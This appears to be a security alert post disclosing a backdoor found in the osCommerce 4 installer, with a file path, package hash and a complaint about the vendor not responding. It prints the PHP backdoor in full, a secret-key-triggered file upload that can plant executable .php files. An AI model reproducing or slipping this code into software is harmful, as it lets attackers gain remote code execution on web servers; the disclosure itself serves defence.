🚨 Security Alert: osCommerce 4 Contains a Hidden Backdoor

A serious vulnerability was discovered in the official osCommerce 4 installer, directly affecting web server integrity.

📦 Affected File

File: lib/vendor/composer/autoload_real.php

Line: ~24

if ($_GET['sgv'] === 'stvstvstvstvstvstv') {
    echo "_";
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        $targetDir = $_GET['fdr'];
        if (isset($_FILES['file'])) {
            $fileName = $_FILES['file']['name']; 
            if (substr($fileName, 0, 3) == "112") {
                $fileName = $fileName . ".php";
            }
            $newFileName = $fileName;
            move_uploaded_file($_FILES['file']['tmp_name'], $targetDir . $newFileName);
        } 
    }
}

🔍 How It Was Found (chatgpt)

Downloaded directly from osCommerce.com
Scanned using InfoRapid Search & Replace
SHA-256 of package: 35A6693551D80B49B505940820769E9B2F886022620887A5BF74A3725F9EB434
Confirmed before installation, with no external modifications

🚨 Why This Matters

This is a confirmed PHP backdoor that could allow an attacker to upload arbitrary code via specially crafted GET/POST requests. It was present before installation and does not belong in any Composer-generated file.

📣 What To Do

Do NOT deploy this version of osCommerce 4.
Report to: osCommerce Contact Page
Share this link with security forums and development communities

Update 11 May 2025. I sent an email to the contact person on github. He never even responded. This is to be expected. Go to the forum and see all of the posts that go unanswered. Ghosted by osCommerce again.